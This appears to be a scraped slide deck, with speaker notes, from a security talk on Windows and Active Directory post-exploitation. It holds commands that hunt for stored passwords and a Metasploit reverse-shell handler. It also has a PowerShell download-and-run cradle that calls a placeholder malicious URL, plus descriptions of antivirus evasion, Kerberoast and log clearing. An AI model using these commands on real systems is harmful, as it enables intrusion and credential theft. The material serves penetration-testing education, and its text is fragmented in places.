2. ABOUT XAVIER
• Currently VP of Drawbridge Networks
• Hacking since the late 80s
• First half my career was implementing
Security
• Second half career is security consulting,
VARs, and Vendors
• Georgia Institute Of Technology:
Computer Engineering with International
Affairs minor
• Twitter: @xavierashe
3. KILL CHAIN IS OUTDATED
Reco
n
Weaponiz
e
Deliver
y
Exploi
t
Insta
ll
C&C
Actio
n
9. SERVICE PRINCIPAL NAMES (SPNS)
• Find SPNs linked to a certain computer
setspn -L <ServerName>
• Find SPNs linked to a certain user account
setspn -L <domainuser>
• Powershell
Get-NetUser -SPN
10. PRIVILEGE ESCALATION
• Look for missing patches, known exploits
• Look in automated install answer files for passwords
• Get saved passwords from Group Policy (metasploit or Get-
GPPPaassword)
• Look for registry setting "AlwaysInstallElevated“
• HKLMSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated
• HKCUSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated
• Hail Mary
• dir /s *pass* == *cred* == *vnc* == *.config*
• findstr /si password *.xml *.ini *.txt
• reg query HKLM /f password /t REG_SZ /s
• reg query HKCU /f password /t REG_SZ /s
11. PRIVILEGE ESCALATION - ADVANCED
• Vulnerable Windows Services
• DLL hijacking using vulnerable folders in the PATH
• Replace executable with existing scheduled task.
13. OR JUST RUN POWERUP
(INVOKE-ALLCHECKS)
• If you are an admin in a medium integrity process (exploitable with bypassuac)
• for any unquoted service path issues
• for any services with misconfigured ACLs (exploitable with service_*)
• any improper permissions on service executables (exploitable
with service_exe_*)
• for any leftover unattend.xml files
• if the AlwaysInstallElevated registry key is set
• if any Autologon credentials are left in the registry
• for any encrypted web.config strings and application pool passwords
• for any %PATH% .DLL hijacking opportunities (exploitable
with write_dllhijacker)
14. POWERSHELL
There are a number of reasons why attackers love PowerShell:
• Run code in memory without touching disk
• Download & execute code from another system
• Direct access to .NET & Win32 API
• Built-in remoting
• CMD.exe is commonly blocked, though not PowerShell
• Most organizations are not watching PowerShell activity
• Many endpoint security products don’t have visibility into PowerShell
activity
15. POWERSHELLV5 SECURITY ENHANCEMENTS
• Script block logging
• System-wide transcripts
• Constrained PowerShell
enforced with AppLocker
• The Anti-Malware Scan
Interface (AMSI)
• There are two primary
methods of bypassing AMSI
(at least for now):
• Provide & use a custom amsi.dll
and call that one from custom
EXE.
• Matt Graeber described how to
use reflection to bypass AMSI
16. REMOTE ACCESS WITH NO HITTO DISK
Create Shellcode from
Metasploit
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD
windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST
<Your local host>
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
Powershell Shellcode Injection
IEX (New-Object
Net.WebClient).DownloadString("https:
//<Malicious URL>/Invoke-
Shellcode.ps1")
Invoke-ShellCode -Payload
windows/meterpreter/reverse_https -
Lhost <malicious IP> -Lport 443 -
Force
20. OTHER WAYSTO GET DOMAIN ADMIN
• Passwords in SYSVOL & Group Policy Preferences
• Exploit the MS14-068 Kerberos Vulnerability on a Domain
Controller Missing the Patch
• Kerberos TGS Service Ticket Offline Cracking (Kerberoast)
• Gain Access to the Active Directory Database File (ntds.dit)
• Compromise an account with rights to logon to a Domain
Controller
• Then run Mimicatz
21. POWERSHELL EMPIRE
Capabilities:
• PowerShell based Remote Access Trojan (RAT).
• Python server component (Kali Linux).
• AES Encrypted C2 channel.
• Dumps and tracks credentials in database.
23. PS>ATTACK
Use for AV Bypass. Build tool for
new encrypted exe every time.
Contains
• PowerTools
• PowerUp
• PowerView
• Nishang
• Powercat
• Inveigh
Powersploit:
• Invoke-Mimikatz
• Get-GPPPassword
• Invoke-NinjaCopy
• Invoke-Shellcode
• Invoke-WMICommand
• VolumeShadowCopyTools
24. REDSNARF
New tool just released by NCC Group
• Retrieval of local SAM hashes
• Enumeration of user(s) running with elevated
system privileges and their corresponding lsa
secrets password
• Retrieval of MS cached credentials
• Pass-the-hash
• Quickly identify weak and guessable
username/password combinations (default of
administrator/Password01)
• The ability to retrieve hashes across a range
• Hash spraying:
• Credsfile will accept a mix of pwdump, fgdump and
plaintext username and password separated by a
space
• Lsass dump for offline analysis with Mimikatz
• Dumping of Domain controller hashes using
NTDSUtil and retrieval of NTDS.dit for local
parsing
• Dumping of Domain controller hashes using the
drsuapi method
• Retrieval of Scripts and Policies folder from a
Domain controller and parsing for 'password'
and 'administrator'
• Ability to decrypt cpassword hashes
• Ability to start a shell on a remote machine
• The ability to clear the event logs (application,
security, setup or system)
• Results and logs are saved on a per-host basis
for analysis
Reconnaissance – Learning about the target using many techniques.
Weaponization – Combining your vector of attack with a malicious payload.
Delivery – Actually transmitting the payload via some communications vector.
Exploitation – Taking advantage of some software or human weakness to get your payload to run.
Installation – The payload establishes persistence of an individual host.
Command & Control (C2) – The malware calls home, providing attacker control.
Actions on Objectives – The bad actor steals or does whatever he was planning on doing.
Passive Information Gathering: Passive Information Gathering is generally only useful if there is a very clear requirement that the information gathering activities never be detected by the target. This type of profiling is technically difficult to perform as we are never sending any traffic to the target organization neither from one of our hosts or “anonymous” hosts or services across the Internet. This means we can only use and gather archived or stored information. As such this information can be out of date or incorrect as we are limited to results gathered from a third party.
Semi-passive Information Gathering: The goal for semi-passive information gathering is to profile the target with methods that would appear like normal Internet traffic and behavior. We query only the published name servers for information, we aren’t performing in-depth reverse lookups or brute force DNS requests, we aren’t searching for “unpublished” servers or directories. We aren’t running network level portscans or crawlers and we are only looking at metadata in published documents and files; not actively seeking hidden content. The key here is not to draw attention to our activities. Post mortem the target may be able to go back and discover the reconnaissance activities but they shouldn’t be able to attribute the activity back to anyone.
Active Information Gathering: Active information gathering should be detected by the target and suspicious or malicious behavior. During this stage we are actively mapping network infrastructure (think full port scans nmap –p1-65535), actively enumerating and/or vulnerability scanning the open services, we are actively searching for unpublished directories, files, and servers. Most of this activity falls into your typically “reconnaissance” or “scanning” activities for your standard pentest.
Note that the value in %USERDOMAIN% may not be the same as the one returned by systeminfo command. %USERDOMAIN% gives the domain name the user account belongs to, it could be different from the domain of the computer. Also, this may give you the NetBios name of the computer, not DNS/FQDN name.
When the box you compromise is connected to a domain it is well worth looking for the Groups.xml file which is stored in SYSVOL. Any authenticated user will have read access to this file. The password in the xml file is "obscured" from the casual user by encrypting it with AES, I say obscured because the static key is published on the msdn website allowing for easy decryption of the stored value.
The next thing we will look for is a strange registry setting "AlwaysInstallElevated", if this setting is enabled it allows users of any privilege level to install *.msi files as NT AUTHORITY\SYSTEM. It seems like a strange idea to me that you would create low privilege users (to restrict their use of the OS) but give them the ability to install programs as SYSTEM.
Metasplot can be used to
Script block logging – logs the PowerShell code actually executed by PowerShell. Without this enabled, obfuscated code is logged, making it far more difficult to create useful indicators.
System-wide transcripts – When enabled, a transcript file can be written to a write-only share for each PowerShell user per computer. If the share is offline, the computer will cache the file data until it’s back online.Constrained PowerShell enforced with AppLocker – When PowerShell v5 installed and AppLocker in Allow mode, PowerShell operates in constrained language mode which is a limited language mode preventing and Windows API access. For more on this, keep reading.
The Anti-Malware Scan Interface (AMSI) in Windows 10 enables all script code to be scanned prior to execution by PowerShell and other Windows scripting engines. The Anti-Virus/Anti-Malware solution on the system must support AMSI for it to scan the code. The great benefit is that all code delivered to the PowerShell engine is scanned, even code injected into memory that was downloaded from the internet. As of mid-2016, only Microsoft Defender and AVG support AMSI.
Invoke-CredentialInjection.ps1 - This script allows an attacker to create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). The script either creates a suspended winlogon.exe process running as SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL in to winlogon.exe which calls LsaLogonUser to create a logon from within winlogon.exe (which is where it is called from when a user logs in using RDP or logs on locally). The injected DLL then impersonates the new logon token with its current thread so that it can be kidnapped using Invoke-TokenManipulation.
His first blog on this subject is cleverly titled "Pass the pass(word)". In this blog, he discusses the fact that Windows Vista and higher feature a Security Support Provider (SSP) for Terminal Services named TsPkg, which provides single sign-on functionality to terminal servers. This feature can also be added to Windows XP SP3, as discussed here. Furthermore, this TechNet article discusses how to enable this SSO feature for specified terminal servers via GPO. However, as the author of the tool stated in his blog, and as my testing confirms, Windows will store the password in memory whether this feature is "enabled" via GPO or not. In other words, by default it's always on.
A few weeks later, the author posted an update titled "Re-pass the pass(word)", where he discusses another SSP providing similar SSO capability, named WDigest. This time it's not only in Vista and higher, but in XP and Server 2003 also!
WDigest provides for "digest access authentication", an extension to HTTP specified by RFC 2069 and later in RFC 2617. Direct access authentication improves upon basic access authentication, which sends credentials in the clear. Wdigest specifically supports RFC 2617, as well as RFC 2831, which is a more generic authentication mechanism (useful beyond HTTP) called Simple Authentication and Security Layer (SASL). The general idea here is that these specifications provide challenge-response authentication, whereby a challenge is issued and the responding party answers the challenge using a hashing routine that takes the clear-text password as an input.
On there other hand, there will obviously be one or more trusted machines for which you will need to perform an interactive logon. For those machines, I suggest you remove the TsPkg and WDigest SSPs to avoid a blatent security risk.
Update: Removing SSPs is no longer valid advice since Kerberos also stores the password. Therefore, the most effective protection is to avoid interactive logons to any untrusted hosts. Other solutions such as one-time-passwords should also be considered.
This method is the simplest since no special “hacking” tool is required. All the attacker has to do is open up Windows explorer and search the domain SYSVOL DFS share for XML files. Most of the time, the following XML files will contain credentials: groups.xml, scheduledtasks.xml, & Services.xml.
Put simply, exploiting MS14-068 takes less than 5 minutes and enables an attacker to effectively re-write a valid Kerberos TGT authentication ticket to make them a Domain Admin (and Enterprise Admin). As shown in the above graphic, this is like taking a valid boarding password and before boarding, writing “pilot” on it. Then while boarding the plane, you are escorted to the cockpit and asked if you would like coffee before taking off.
This attack involves requesting a Kerberos service ticket(s) (TGS) for the Service Principal Name (SPN) of the target service account. This request uses a valid domain user’s authentication ticket (TGT) to request one or several service tickets for a target service running on a server. The Domain Controller doesn’t track if the user ever actually connects to these resources (or even if the user has access). The Domain Controller looks up the SPN in Active Directory and encrypts the ticket using the service account associated with the SPN in order for the service to validate user access. The encryption type of the requested Kerberos service ticket is RC4_HMAC_MD5 which means the service account’s NTLM password hash is used to encrypt the service ticket. This means that Kerberoast can attempt to open the Kerberos ticket by trying different NTLM hashes and when the ticket is successfully opened, the correct service account password is discovered.
Note: No elevated rights are required to get the service tickets and no traffic is sent to the target.
PS>Attack is a self contained custom PowerShell console which includes many offensive PowerShell tools which calls PowerShell (System.Management.Automation.dll) through .Net. The PowerShell attack tools are encrypted (AV evasion) and decrypted to memory at run-time.
There’s also a custom build tool for ensuring every built exe is different (AV bypass).
While PS>Attack is simply one method that an attacker can leverage PowerShell offensive tools without running
PS>Attack PowerShell code runs in the earlier version of the PowerShell engine, if available.This means that if a system has PowerShell v2 (Windows 7 & Windows Server 2008 R2), then any PowerShell code executed is not logged. Event if PowerShell v5 is installed with system-wide transcript or script block logging.
Windows 10 provides the ability to remove PowerShell v2.0 (no, this doesn’t remove PowerShell). Once PowerShell v2 is removed from Windows 10, PS>Attack usage is clearly logged.